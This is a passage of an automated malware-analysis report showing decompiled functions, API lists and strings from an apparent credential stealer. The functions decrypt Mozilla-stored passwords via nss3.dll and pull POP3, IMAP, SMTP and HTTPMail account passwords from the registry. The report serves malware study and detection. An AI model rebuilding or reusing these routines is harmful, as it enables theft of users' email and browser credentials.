Opcode Fuzzy Hash: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
Instruction Fuzzy Hash: 82B12271644388FFEB16CF74CC45BDABBA5BF14304F00406AFA44A7292C7B5A954CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB39, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040DB39(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
				char _v0;
				struct HWND__* _v4;
				void* __edi;
				void* _t44;
				void* _t58;
				int _t59;
				int _t61;
				int _t62;
				long _t66;
				struct HWND__* _t93;
				intOrPtr _t122;
				unsigned int _t125;
				signed int _t127;
				signed int _t128;
				void* _t134;

				_t128 = _t127 & 0xfffffff8;
				E004118A0(0x1424, __ecx);
				_t44 = _a8 - 0x110;
				if(_t44 == 0) {
					E00406491(__edx, _a4);
					 *_t128 = 0x7ff;
					_a3104 = 0;
					memset( &_a3105, 0, ??);
					asm("movsd");
					asm("movsd");
					asm("movsw");
					memset( &_a10, 0, 0xfb);
					_a520 = 0;
					memset( &_a521, 0, 0xff);
					_a264 = 0;
					memset( &_a265, 0, 0xff);
					_a1056 = 0;
					memset( &_a1057, 0, 0x3ff);
					_a2080 = 0;
					memset( &_a2081, 0, 0x3ff);
					_t134 = _t128 + 0x48;
					_t58 = GetCurrentProcess();
					_t102 =  &_a520;
					_v4 = _t58;
					_t59 = ReadProcessMemory(_t58,  *0x416c64,  &_a520, 0x80, 0);
					__eflags = _t59;
					if(_t59 != 0) {
						E00406585( &_a1056,  &_a520, 4);
						_pop(_t102);
					}
					_t61 = ReadProcessMemory(_v4,  *0x416c58,  &_a264, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00406585( &_a2080,  &_a264, 0);
						_pop(_t102);
					}
					_t62 = E0040629C();
					__eflags = _t62;
					if(_t62 == 0) {
						E0040E056();
					} else {
						E0040E0DA();
					}
					__eflags =  *0x417514;
					if(__eflags != 0) {
						L17:
						_a776 = 0;
						memset( &_a780, 0, 0x114);
						_t122 =  *0x416e7c; // 0x0
						_t134 = _t134 + 0xc;
						_t66 = GetCurrentProcessId();
						 *0x417108 = 0;
						E0040E255(_t102, __eflags, _t66, _t122);
						__eflags =  *0x417108;
						if( *0x417108 != 0) {
							memcpy( &_a776, 0x416ff0, 0x118);
							_t134 = _t134 + 0xc;
							__eflags =  *0x417108;
							if( *0x417108 != 0) {
								strcpy( &_v0, E004061E6( &_a784));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x417518;
						if(__eflags == 0) {
							L20:
							sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x416e70,  *0x416e7c,  &_v0,  *0x416c50,  *0x416c44,  *0x416c4c,  *0x416c48,  *0x416c40,  *0x416c3c,  *0x416c54,  *0x416c64,  *0x416c58,  &_a1056,  &_a2080);
							SetDlgItemTextA(_a4, 0x3ea,  &_a3104);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t44 == 1) {
					_t125 = _a12;
					if(_t125 >> 0x10 == 0) {
						if(_t125 == 3) {
							_t93 = GetDlgItem(_a4, 0x3ea);
							_v4 = _t93;
							SendMessageA(_t93, 0xb1, 0, 0xffff);
							SendMessageA(_v4, 0x301, 0, 0);
							SendMessageA(_v4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}

0x0040db3c
0x0040db44
0x0040db4c
0x0040db54
0x0040dbd8
0x0040dbdf
0x0040dbef
0x0040dbf6
0x0040dc04
0x0040dc08
0x0040dc14
0x0040dc16
0x0040dc2d
0x0040dc34
0x0040dc46
0x0040dc4d
0x0040dc64
0x0040dc6b
0x0040dc7d
0x0040dc84
0x0040dc89
0x0040dc8c
0x0040dc9e
0x0040dcac
0x0040dcb1
0x0040dcb3
0x0040dcb5
0x0040dcc8
0x0040dcce
0x0040dcce
0x0040dce7
0x0040dce9
0x0040dceb
0x0040dcfd
0x0040dd03
0x0040dd03
0x0040dd04
0x0040dd09
0x0040dd0b
0x0040dd14
0x0040dd0d
0x0040dd0d
0x0040dd0d
0x0040dd19
0x0040dd1f
0x0040dd29
0x0040dd37
0x0040dd3e
0x0040dd43
0x0040dd49
0x0040dd4c
0x0040dd54
0x0040dd5a
0x0040dd5f
0x0040dd67
0x0040dd7b
0x0040dd80
0x0040dd83
0x0040dd89
0x0040dd9d
0x0040dda3
0x0040dd89
0x00000000
0x0040dd21
0x0040dd21
0x0040dd27
0x0040dda4
0x0040de08
0x0040de21
0x0040de32
0x0040de38
0x0040de40
0x0040de40
0x00000000
0x0040dd27
0x0040dd1f
0x0040db57
0x0040db5d
0x0040db68
0x0040db8b
0x0040db99
0x0040dbb4
0x0040dbb8
0x0040dbc5
0x0040dbce
0x0040dbce
0x0040db8b
0x0040db68
0x00000000

APIs

EndDialog.USER32(?,?), ref: 0040DB81
GetDlgItem.USER32 ref: 0040DB99
SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040DBB8
SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040DBC5
SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040DBCE
memset.MSVCRT ref: 0040DBF6
memset.MSVCRT ref: 0040DC16
memset.MSVCRT ref: 0040DC34
memset.MSVCRT ref: 0040DC4D
memset.MSVCRT ref: 0040DC6B
memset.MSVCRT ref: 0040DC84
GetCurrentProcess.KERNEL32 ref: 0040DC8C
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040DCB1
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040DCE7
memset.MSVCRT ref: 0040DD3E
GetCurrentProcessId.KERNEL32 ref: 0040DD4C
memcpy.MSVCRT ref: 0040DD7B
strcpy.MSVCRT(?,00000000), ref: 0040DD9D
sprintf.MSVCRT ref: 0040DE08
SetDlgItemTextA.USER32 ref: 0040DE21
GetDlgItem.USER32 ref: 0040DE2B
SetFocus.USER32(00000000), ref: 0040DE32

Strings

{Unknown}, xrefs: 0040DBFB
Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040DE02

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
API String ID: 138940113-3474136107
Opcode ID: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
Instruction ID: 36e6f19d437acde9dae1843bd1f228cb1d7049f577ea92cd8b51c55dddb48a69
Opcode Fuzzy Hash: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
Instruction Fuzzy Hash: 6D711C72844244BFD721EF51DC41EEB3BEDEF94344F00843EF649921A0DA399A58CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040DEEE, Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 113
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DEEE(struct HINSTANCE__** __esi, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __ebx;
				void* __edi;
				int _t39;
				void* _t44;
				struct HINSTANCE__* _t53;
				struct HINSTANCE__* _t56;
				struct HINSTANCE__** _t69;

				_t69 = __esi;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				if(_a4 != 0) {
					E004060D0(0x104,  &_v268, _a4);
				}
				if(_v268 != 0) {
					GetCurrentDirectoryA(0x104,  &(_t69[8]));
					SetCurrentDirectoryA( &_v268);
					_v532 = 0;
					memset( &_v531, 0, 0x104);
					_t39 = strlen("nss3.dll");
					_t13 = strlen( &_v268) + 1; // 0x1
					if(_t39 + _t13 >= 0x104) {
						_v532 = 0;
					} else {
						E004062AD( &_v532,  &_v268, "nss3.dll");
					}
					_t44 = GetModuleHandleA( &_v532);
					 *_t69 = _t44;
					if(_t44 != 0) {
						L9:
						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
					} else {
						_t53 = LoadLibraryExA( &_v532, _t44, 8);
						 *_t69 = _t53;
						if(_t53 != 0) {
							goto L9;
						} else {
							E0040DEA9();
							_t56 = LoadLibraryExA( &_v532, 0, 8);
							 *_t69 = _t56;
							if(_t56 != 0) {
								goto L9;
							}
						}
					}
				}
				return 0 |  *_t69 != 0x00000000;
			}

0x0040deee
0x0040df08
0x0040df0f
0x0040df1b
0x0040df26
0x0040df2b
0x0040df33
0x0040df3e
0x0040df4b
0x0040df5b
0x0040df62
0x0040df6c
0x0040df7f
0x0040df88
0x0040dfa5
0x0040df8a
0x0040df9c
0x0040dfa2
0x0040dfb3
0x0040dfbb
0x0040dfbd
0x0040dfef
0x0040e005
0x0040e011
0x0040e01d
0x0040e029
0x0040e035
0x0040e041
0x0040e046
0x0040dfbf
0x0040dfcf
0x0040dfd3
0x0040dfd5
0x00000000
0x0040dfd7
0x0040dfd7
0x0040dfe7
0x0040dfeb
0x0040dfed
0x00000000
0x00000000
0x0040dfed
0x0040dfd5
0x0040dfbd
0x0040e053

APIs

memset.MSVCRT ref: 0040DF0F
GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
memset.MSVCRT ref: 0040DF62
strlen.MSVCRT ref: 0040DF6C
strlen.MSVCRT ref: 0040DF7A
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E044

Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA

Strings

nss3.dll, xrefs: 0040DF67, 0040DF90
NSS_Shutdown, xrefs: 0040DFFE
PK11_GetInternalKeySlot, xrefs: 0040E00A
PK11SDR_Decrypt, xrefs: 0040E03A
PK11_Authenticate, xrefs: 0040E02E
PK11_CheckUserPassword, xrefs: 0040E022
NSS_Init, xrefs: 0040DFF5
PK11_FreeSlot, xrefs: 0040E016

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
API String ID: 1296682400-4029219660
Opcode ID: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
Instruction ID: fea3831f464983b0eef39fbf9020f470c327cc413978f8e1f023dd725517e53d
Opcode Fuzzy Hash: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
Instruction Fuzzy Hash: 2A4187B1940309AACB20AF75CC49FC6BBF8AF64704F10496AE185E2191E7B996D4CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00402606, Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 127
stringCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00402606(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t58;
				void* _t59;
				void* _t67;
				void* _t70;
				void* _t73;
				void* _t87;
				signed int _t90;
				void* _t92;
				signed int _t96;
				intOrPtr _t100;
				intOrPtr _t101;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t114;

				_t114 = __fp0;
				_t92 = __ecx;
				_t103 = _t105 - 0x6c;
				_t106 = _t105 - 0x474;
				 *(_t103 + 0x4c) = "POP3 User Name";
				 *(_t103 + 0x50) = "IMAP User Name";
				 *(_t103 + 0x54) = "HTTPMail User Name";
				 *(_t103 + 0x58) = "SMTP USer Name";
				 *(_t103 + 0x1c) = "POP3 Server";
				 *(_t103 + 0x20) = "IMAP Server";
				 *(_t103 + 0x24) = "HTTPMail Server";
				 *(_t103 + 0x28) = "SMTP Server";
				 *(_t103 + 0x3c) = "POP3 Password2";
				 *(_t103 + 0x40) = "IMAP Password2";
				 *(_t103 + 0x44) = "HTTPMail Password2";
				 *(_t103 + 0x48) = "SMTP Password2";
				 *(_t103 + 0x2c) = "POP3 Port";
				 *(_t103 + 0x30) = "IMAP Port";
				 *(_t103 + 0x34) = "HTTPMail Port";
				 *(_t103 + 0x38) = "SMTP Port";
				 *(_t103 + 0x5c) = "POP3 Secure Connection";
				 *(_t103 + 0x60) = "IMAP Secure Connection";
				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
				 *(_t103 + 0x68) = "SMTP Secure Connection";
				_t90 = 0;
				do {
					 *(_t103 - 0x64) = 0;
					memset(_t103 - 0x63, 0, 0x7f);
					_push(_t103 - 0x64);
					_t96 = _t90 << 2;
					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
					_push( *((intOrPtr*)(_t103 + 0x78)));
					_t58 = 0x7f;
					_t59 = E0040EB80(_t58, _t92);
					_t106 = _t106 + 0x18;
					if(_t59 == 0) {
						E004021D8(_t103 - 0x408);
						strcpy(_t103 - 0x1f4, _t103 - 0x64);
						_t100 =  *((intOrPtr*)(_t103 + 0x78));
						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
						_t34 = _t90 + 1; // 0x1
						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
						_push(_t103 - 0x2f8);
						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
						_push(_t100);
						_t67 = 0x7f;
						E0040EB80(_t67, _t92);
						_push(_t103 - 0x3fc);
						_push("SMTP Display Name");
						_push(_t100);
						_t70 = 0x7f;
						E0040EB80(_t70, _t92);
						_push(_t103 - 0x378);
						_push("SMTP Email Address");
						_push(_t100);
						_t73 = 0x7f;
						E0040EB80(_t73, _t92);
						_t108 = _t106 + 0x2c;
						if(_t90 != 3) {
							_push(_t103 - 0x278);
							_push("SMTP Server");
							_push(_t100);
							_t87 = 0x7f;
							E0040EB80(_t87, _t92);
							_t108 = _t108 + 0xc;
						}
						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
						_t106 = _t108 + 0x18;
						_t101 =  *((intOrPtr*)(_t103 + 0x74));
						E0040246C(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
						_pop(_t92);
						_t59 = E00402407(_t103 - 0x408, _t114, _t101);
					}
					_t90 = _t90 + 1;
				} while (_t90 < 4);
				return _t59;
			}

0x00402606
0x00402606
0x00402607
0x0040260b
0x00402614
0x0040261b
0x00402622
0x00402629
0x00402630
0x00402637
0x0040263e
0x00402645
0x0040264c
0x00402653
0x0040265a
0x00402661
0x00402668
0x0040266f
0x00402676
0x0040267d
0x00402684
0x0040268b
0x00402692
0x00402699
0x004026a0
0x004026a2
0x004026aa
0x004026ae
0x004026b6
0x004026b9
0x004026bc
0x004026c0
0x004026c5
0x004026c6
0x004026cb
0x004026d0
0x004026dc
0x004026ec
0x004026f4
0x004026f7
0x004026fd
0x00402700
0x0040270c
0x0040270d
0x00402711
0x00402714
0x00402715
0x00402720
0x00402721
0x00402726
0x00402729
0x0040272a
0x00402735
0x00402736
0x0040273b
0x0040273e
0x0040273f
0x00402744
0x0040274a
0x00402752
0x00402753
0x00402758
0x0040275b
0x0040275c
0x00402761
0x00402761
0x0040276d
0x0040277b
0x00402780
0x00402791
0x00402796
0x004027a9
0x004027af
0x004027b7
0x004027b7
0x004027bc
0x004027bd
0x004027cd

APIs

memset.MSVCRT ref: 004026AE

Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B

strcpy.MSVCRT(?,?,?,?,?,74B5ED80,?,00000000), ref: 004026EC
strcpy.MSVCRT(?,?), ref: 004027A9

Strings

SMTP Secure Connection, xrefs: 00402699
IMAP Password2, xrefs: 00402653
SMTP Server, xrefs: 00402645, 00402753
IMAP Secure Connection, xrefs: 0040268B
POP3 Port, xrefs: 00402668
SMTP Email Address, xrefs: 00402736
POP3 Password2, xrefs: 0040264C
HTTPMail Server, xrefs: 0040263E
POP3 Secure Connection, xrefs: 00402684
HTTPMail Secure Connection, xrefs: 00402692
POP3 User Name, xrefs: 00402614
SMTP Display Name, xrefs: 00402721
HTTPMail Port, xrefs: 00402676
SMTP Password2, xrefs: 00402661
SMTP USer Name, xrefs: 00402629
HTTPMail Password2, xrefs: 0040265A
IMAP Port, xrefs: 0040266F
IMAP User Name, xrefs: 0040261B
HTTPMail User Name, xrefs: 00402622
SMTP Port, xrefs: 0040267D
IMAP Server, xrefs: 00402637
POP3 Server, xrefs: 00402630

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcpy$QueryValuememset
String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
API String ID: 3373037483-1627711381
Opcode ID: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
Instruction ID: d93c2979c5964ee18a3e8d610d8756237e52e0a5809c5516356d8c5187ea57d6
Opcode Fuzzy Hash: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
Instruction Fuzzy Hash: E04186B190021CAADB10DF91DE49ADE37B8EF04348F10446BFD18E7191D3B89699CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004027D0, Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 118
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004027D0(void* __fp0) {
				void* __esi;
				void* _t66;
				signed int _t92;
				void* _t95;
				intOrPtr _t109;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t121;

				_t121 = __fp0;
				_t111 = _t113 - 0x70;
				_t114 = _t113 - 0x474;
				 *(_t111 + 0x40) = "POP3 Password";
				 *(_t111 + 0x44) = "IMAP Password";
				 *(_t111 + 0x48) = "HTTP Password";
				 *(_t111 + 0x4c) = "SMTP Password";
				 *(_t111 + 0x50) = "POP3 User";
				 *(_t111 + 0x54) = "IMAP User";
				 *(_t111 + 0x58) = "HTTP User";
				 *(_t111 + 0x5c) = "SMTP User";
				 *(_t111 + 0x20) = "POP3 Server";
				 *(_t111 + 0x24) = "IMAP Server";
				 *(_t111 + 0x28) = "HTTP Server URL";
				 *(_t111 + 0x2c) = "SMTP Server";
				 *(_t111 + 0x30) = "POP3 Port";
				 *(_t111 + 0x34) = "IMAP Port";
				 *(_t111 + 0x38) = "HTTP Port";
				 *(_t111 + 0x3c) = "SMTP Port";
				 *(_t111 + 0x60) = "POP3 Use SPA";
				 *(_t111 + 0x64) = "IMAP Use SPA";
				 *(_t111 + 0x68) = "HTTPMail Use SSL";
				 *(_t111 + 0x6c) = "SMTP Use SSL";
				_t92 = 0;
				do {
					 *(_t111 - 0x60) = 0;
					memset(_t111 - 0x5f, 0, 0x7f);
					_t114 = _t114 + 0xc;
					_t100 = _t92 << 2;
					_t66 = E004029A7(_t111 - 0x60,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + (_t92 << 2) + 0x50)));
					if(_t66 != 0) {
						E004021D8(_t111 - 0x404);
						strcpy(_t111 - 0x1f0, _t111 - 0x60);
						_pop(_t95);
						 *((intOrPtr*)(_t111 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x78)) + 0xb1c));
						_t37 = _t92 + 1; // 0x1
						 *((intOrPtr*)(_t111 - 0x1f4)) = _t37;
						E004029A7(_t111 - 0x2f4,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x20)));
						E004029A7(_t111 - 0x3f8,  *((intOrPtr*)(_t111 + 0x7c)), "Display Name");
						E004029A7(_t111 - 0x374,  *((intOrPtr*)(_t111 + 0x7c)), "Email");
						if(_t92 != 3) {
							E004029A7(_t111 - 0x274,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Server");
							E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Port", _t111 - 0x68);
							_t114 = _t114 + 0xc;
						}
						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x30)), _t111 - 0x70);
						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x60)), _t111 - 0x6c);
						_t109 =  *((intOrPtr*)(_t111 + 0x78));
						_t114 = _t114 + 0x18;
						E0040246C(_t109, _t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x40)), _t111 - 0x170, 1);
						strcpy(_t111 - 0xf0, _t109 + 0xa9c);
						_t66 = E00402407(_t111 - 0x404, _t121, _t109);
					}
					_t92 = _t92 + 1;
				} while (_t92 < 4);
				return _t66;
			}

0x004027d0
0x004027d1
0x004027d5
0x004027de
0x004027e5
0x004027ec
0x004027f3
0x004027fa
0x00402801
0x00402808
0x0040280f
0x00402816
0x0040281d
0x00402824
0x0040282b
0x00402832
0x00402839
0x00402840
0x00402847
0x0040284e
0x00402855
0x0040285c
0x00402863
0x0040286a
0x0040286c
0x00402874
0x00402878
0x0040287d
0x00402882
0x0040288f
0x00402896
0x004028a2
0x004028b2
0x004028c1
0x004028c6
0x004028cf
0x004028d8
0x004028de
0x004028f1
0x00402904
0x0040290c
0x0040291c
0x0040292d
0x00402932
0x00402932
0x00402940
0x00402950
0x00402955
0x00402958
0x0040296d
0x00402980
0x0040298e
0x0040298e
0x00402993
0x00402994
0x004029a4

APIs

memset.MSVCRT ref: 00402878

Part of subcall function 004029A7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029E9

strcpy.MSVCRT(?,?,74B5ED80,?,00000000), ref: 004028B2
strcpy.MSVCRT(?,?,?,?,?,?,?,?,74B5ED80,?,00000000), ref: 00402980

Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78

Strings

SMTP User, xrefs: 0040280F
HTTP Port, xrefs: 00402840
IMAP Password, xrefs: 004027E5
Email, xrefs: 004028F6
HTTP User, xrefs: 00402808
SMTP Server, xrefs: 0040282B, 0040290E
POP3 User, xrefs: 004027FA
POP3 Port, xrefs: 00402832
POP3 Password, xrefs: 004027DE
Display Name, xrefs: 004028E3
SMTP Password, xrefs: 004027F3
IMAP User, xrefs: 00402801
SMTP Use SSL, xrefs: 00402863
IMAP Port, xrefs: 00402839
HTTP Password, xrefs: 004027EC
POP3 Use SPA, xrefs: 0040284E
HTTPMail Use SSL, xrefs: 0040285C
SMTP Port, xrefs: 00402847, 00402925
IMAP Server, xrefs: 0040281D
IMAP Use SPA, xrefs: 00402855
POP3 Server, xrefs: 00402816
HTTP Server URL, xrefs: 00402824

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcpy$ByteCharMultiQueryValueWidememset
String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
API String ID: 2416467034-4086712241
Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
Instruction ID: 2a04afc1b401ca52673312b513a052c1616a462ab9372f8060d899744f0eb97e
Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
Instruction Fuzzy Hash: FF513EB150025DABCF24DF61DE499DD7BB8FF04308F10416AF924A6191D3B999A9CF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040F435, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 168
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040F435(CHAR* __eax) {
				void* _v8;
				int _v12;
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void _v787;
				char _v788;
				void _v1051;
				char _v1052;
				void _v2075;
				char _v2076;
				void* __esi;
				void* _t45;
				void* _t59;
				char* _t60;
				char* _t71;
				char* _t75;
				void* _t84;
				CHAR* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;

				_t89 = __eax;
				_v1052 = 0;
				memset( &_v1051, 0, 0x104);
				_v788 = 0;
				memset( &_v787, 0, 0xff);
				 *_t89 = 0;
				_t45 = E0040EB3F(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
				_t91 = _t90 + 0x24;
				if(_t45 != 0) {
					L12:
					strcpy(_t89,  &_v1052);
					if( *_t89 == 0) {
						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
						if(E0040F3BA(_t89) == 0) {
							 *_t89 = 0;
						}
						if( *_t89 == 0) {
							E00406172(_t89);
							if(E0040F3BA(_t89) == 0) {
								 *_t89 = 0;
							}
							if( *_t89 == 0) {
								GetCurrentDirectoryA(0x104, _t89);
								if(E0040F3BA(_t89) == 0) {
									 *_t89 = 0;
								}
							}
						}
					}
					return 0 |  *_t89 != 0x00000000;
				} else {
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					_v12 = 0;
					_t59 = E0040EC05(_v8, 0,  &_v268);
					_t92 = _t91 + 0x18;
					while(_t59 == 0) {
						_push(7);
						_t60 =  &_v268;
						_push("mozilla");
						_push(_t60);
						L00411642();
						_t93 = _t92 + 0xc;
						if(_t60 == 0) {
							_v532 = 0;
							memset( &_v531, 0, 0x104);
							_v2076 = 0;
							memset( &_v2075, 0, 0x3ff);
							_push( &_v268);
							_push("%s\\bin");
							_push(0x3ff);
							_push( &_v2076);
							L00411648();
							E0040EBC1(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
							_t71 =  &_v532;
							_push(0x5c);
							_push(_t71);
							L0041164E();
							_t93 = _t93 + 0x44;
							if(_t71 != 0) {
								 *_t71 = 0;
							}
							if(_v532 != 0 && E0040F3BA( &_v532) != 0) {
								_push( &_v788);
								_t75 =  &_v268;
								L004115C4();
								_t84 = _t75;
								if(_t75 > 0) {
									strcpy( &_v1052,  &_v532);
									strcpy( &_v788,  &_v268);
									_t93 = _t93 + 0x10;
								}
							}
						}
						_v12 = _v12 + 1;
						_t59 = E0040EC05(_v8, _v12,  &_v268);
						_t92 = _t93 + 0xc;
					}
					RegCloseKey(_v8);
					goto L12;
				}
			}

0x0040f449
